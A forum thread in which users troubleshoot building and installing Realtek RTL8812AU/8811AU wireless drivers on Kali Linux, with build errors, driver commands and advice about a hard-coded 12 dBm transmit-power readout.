Post by: PlasticbagsAU on September 19, 2017, 07:08:20 pm
This error is discussed here

https://github.com/astsam/rtl8812au/issues/31
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on September 20, 2017, 05:17:19 am
A few things:
1. No need to PM, I read the forum as you can see
2. read carefully the URL I mentioned.
3. 4.9 is out of date, update your kali (currently 4.12 or 4.13).
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: PlasticbagsAU on September 20, 2017, 10:44:00 am
A few things:
1. No need to PM, I read the forum as you can see
2. read carefully the URL I mentioned.
3. 4.9 is out of date, update your kali (currently 4.12 or 4.13).

Im so sorry! I thought I would quickly PM you my problem as I wasnt sure if I had missed something simple.

So ive actually jumped on linux this time to give you a full description...this is a fresh install of kali 2017.1

apt-get update && apt-get upgrade && apt-get dist-upgrade
apt-get install dkms
apt-get install make

reboot

uname -a
>Linux localhost.localdomain 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 GNU/Linux

git clone https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au
make RTL8814=1

>make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/4.12.0-kali2-amd64/build M=/root/rtl8812au  modules
make[1]: *** /lib/modules/4.12.0-kali2-amd64/build: No such file or directory.  Stop.
Makefile:1857: recipe for target 'modules' failed
make: *** [modules] Error 2

sudo ./dkms-install.sh
sudo: ./dkms-install.sh: command not found

The only thing that gets the v5.1.5 driver installed is

apt-get install realtek-rtl88xxau-dkms

Which will install 5.1.5 with working frame injection and monitor mode, but the txpower is limited to 12 which renders it effectively useless as my WN722N is 20db.

I have tried installing the older 4.3.21 astsam drivers as well

git clone -b v4.3.21 https://github.com/astsam/rtl8812au.git
cd rtl8812au

make RTL8814=1 DEBUG=1
>make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/4.12.0-kali2-amd64/build M=/root/rtl8812au  modules
make[1]: *** /lib/modules/4.12.0-kali2-amd64/build: No such file or directory.  Stop.
Makefile:1717: recipe for target 'modules' failed
make: *** [modules] Error 2

the only way I get any function is

apt-get install realtek-rtl88xxau-dkms

reboot

which rebuilds the 4.12 kernel

so with both the TPLINK WN722N V1 and the AWUS1900 installed

iwconfig
lo        no wireless extensions.

wlan1     IEEE 802.11  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
         
eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=12 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

wlan0 being the AWUS1900 and as you can see here it is locked to 12dBm regardless of what I do rendering  it practically useless against my TPLINK.

If only I could get the 4.3.21 drivers to install! Im not sure why the manual install of the astsam drivers didnt work for me.

Sorry if ive asked any noob questions, I am relatively new to linux but am really determined to get this card to work!

:)
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on September 26, 2017, 06:58:51 pm
Check the bug tracker, the 12db is a bug and kimocoder is working on it.

FYI, doing upgrade is useless, dist-upgrade already does the upgrade.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: Tung Nguyen on October 10, 2017, 12:03:25 am
If you update a new version for your kali linux. You need a new driver for it.
https://github.com/aircrack-ng/rtl8812au . this one works on kali 4.13.0 .
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kcdtv on October 18, 2017, 10:00:39 am
Quote
as you can see here it is locked to 12dBm
Don't bother about this: It is an hard-coded value that you can see here:
Code: [Select]
cfg80211_rtw_get_txpower next line *dbm = (12);It has no relation with reality
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kimocoder on October 18, 2017, 08:09:13 pm
Hi there!

as @kcdtv mentions and my tests confirms, the 12dBm issue is hard coded and shows incorrectly.
however, some new stuff have been added to the driver, both some fixes + adapter support but has not been included in the Kali repo's package.

one issue is currently remaining and should get focus, where the issue is explained at https://github.com/aircrack-ng/rtl8812au/issues/28 (https://github.com/aircrack-ng/rtl8812au/issues/28)
WPA handshake captures seems to be a problem at the moment.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: Goga777 on November 12, 2017, 09:38:48 am
I have Edimax 7811DAC AC600 with external wifi antenna, based on RTL8811au chip.
http://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/me/wireless_adapters_ac600_dual-band/ew-7811dac/

I have classical Debian sid with kernel 4.13, I compiled the 5.1.5 drivers from https://github.com/aircrack-ng/rtl8812au and I noted that signal from my router on 2,4 GHz very poor - 90db. I moved my notebook near the router and there is some improvement -70db. But with internal wifi antenna, I have much better results - 50db. With 5 GHz everything is ok, except a problem with WPA authentification - but it is another story.  I will describe it later.

Is there any way to improve the quality of signal on 2,4 GHz?
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: Goga777 on November 12, 2017, 08:33:39 pm
maybe such patches will be actual for current branch
https://github.com/LibreELEC/LibreELEC.tv/tree/2eb49f99ba20a7055939a8064a68d9ad27acd9d8/packages/linux-drivers/RTL8812AU/patches
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: AtlantisVip on April 05, 2018, 06:32:45 pm
Does this work out of the box now or are there still driver issues?
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on April 05, 2018, 07:15:39 pm
You still need to install the driver. Some distro have a package, others, you'll have to fetch the driver and compile it yourself.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: wakawaka on May 25, 2018, 05:32:30 am
Cant get my RTL8811AU adaptor to work with Kali 2018.2, need help.....details as below.
RTL8811AU adaptor is ID 0bda:a811 Realtek Semiconductor Corp


===========================================================
root@kali:~# sudo apt-get install build-essential
Reading package lists... Done
Building dependency tree       
Reading state information... Done
build-essential is already the newest version (12.4).
0 upgraded, 0 newly installed, 0 to remove and 649 not upgraded.
root@kali:~# sudo apt-get install bc
Reading package lists... Done
Building dependency tree       
Reading state information... Done
bc is already the newest version (1.07.1-2).
0 upgraded, 0 newly installed, 0 to remove and 649 not upgraded.
root@kali:~# sudo apt-get install linux-headers-`uname -r`
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package linux-headers-4.15.0-kali2-amd64
E: Couldn't find any package by glob 'linux-headers-4.15.0-kali2-amd64'
E: Couldn't find any package by regex 'linux-headers-4.15.0-kali2-amd64'

==========================================================
root@kali:~# airmon-ng check kill
ls: cannot access '/sys/class/ieee80211/': No such file or directory

Killing these processes:

  PID Name
  819 wpa_supplicant
  921 dhclient
======================================================
root@kali:~# airmon-ng
ls: cannot access '/sys/class/ieee80211/': No such file or directory

PHY   Interface   Driver      Chipset

===============================================================
root@kali:~# lsusb
Bus 001 Device 003: ID 1b1c:1a90 Corsair Flash Voyager GT
Bus 001 Device 002: ID 0bda:a811 Realtek Semiconductor Corp.
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
================================================================
root@kali:~# git clone -b v5.1.5 https://github.com/aircrack-ng/rtl8812au.git
Cloning into 'rtl8812au'...
remote: Counting objects: 3718, done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 3718 (delta 2), reused 5 (delta 0), pack-reused 3706
Receiving objects: 100% (3718/3718), 7.98 MiB | 127.00 KiB/s, done.
Resolving deltas: 100% (2473/2473), done.

root@kali:~# cd rtl*

root@kali:~/rtl8812au# sudo ./dkms-install.sh
About to run dkms install steps...

Creating symlink /var/lib/dkms/rtl8812au/5.1.5/source ->
                 /usr/src/rtl8812au-5.1.5

DKMS: add completed.
Error! echo
Your kernel headers for kernel 4.15.0-kali2-amd64 cannot be found at
/lib/modules/4.15.0-kali2-amd64/build or /lib/modules/4.15.0-kali2-amd64/source.
Error! echo
Your kernel headers for kernel 4.15.0-kali2-amd64 cannot be found at
/lib/modules/4.15.0-kali2-amd64/build or /lib/modules/4.15.0-kali2-amd64/source.
Finished running dkms install steps.
root@kali:~/rtl8812au#

========================================================
root@kali:~# uname -r
4.15.0-kali2-amd64


root@kali:~# apt install linux-headers-4.15.0-kali2-amd64
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package linux-headers-4.15.0-kali2-amd64
E: Couldn't find any package by glob 'linux-headers-4.15.0-kali2-amd64'
E: Couldn't find any package by regex 'linux-headers-4.15.0-kali2-amd64'

root@kali:~# apt install linux-image-4.15.0-kali2-amd64
Reading package lists... Done
Building dependency tree       
Reading state information... Done
linux-image-4.15.0-kali2-amd64 is already the newest version (4.15.11-1kali1).
linux-image-4.15.0-kali2-amd64 set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 649 not upgraded.
===========================================================
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kimocoder on July 15, 2018, 08:27:57 pm
RTL8812AU support forum is moved over here https://forum.aircrack-ng.org/index.php/board,16.0.html (https://forum.aircrack-ng.org/index.php/board,16.0.html)
Please use that forum for questions related to the drivers. Thanks
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: peterfarge on July 19, 2018, 11:27:14 pm
Hi Chaostar!
I was not aware about rtl8811 existence.  :D
If you use Kali linux try with the dkms package and tell us how it went.
If you don't have kali linux or if the dkms package didn't work with your chipset, try to install the drivers using the source code:
Code: [Select]
git clone -b v4.3.21 https://github.com/astsam/rtl8812au.git
Code: [Select]
cd rtl8812au
Code: [Select]
make RTL8811=1 DEBUG=1
Code: [Select]
sudo make installPlease do some feedback: Like this astsam will be able to fix the issue if there is one. 
Have a  good day! :)


Does this driver supports monitor mode and packet injection?
I can buy a used rtl8811au card in my hometown, but I couldnt find no distinct information that this chipset can be used for pentesting. On the other hand I find a lot of complains about realtek wifi chipsets in general.

Another driver manuel.
https://dustymabe.com/2016/01/24/802.11ac-on-linux-with-netgear-a6100-rtl8811au-usb-adapter/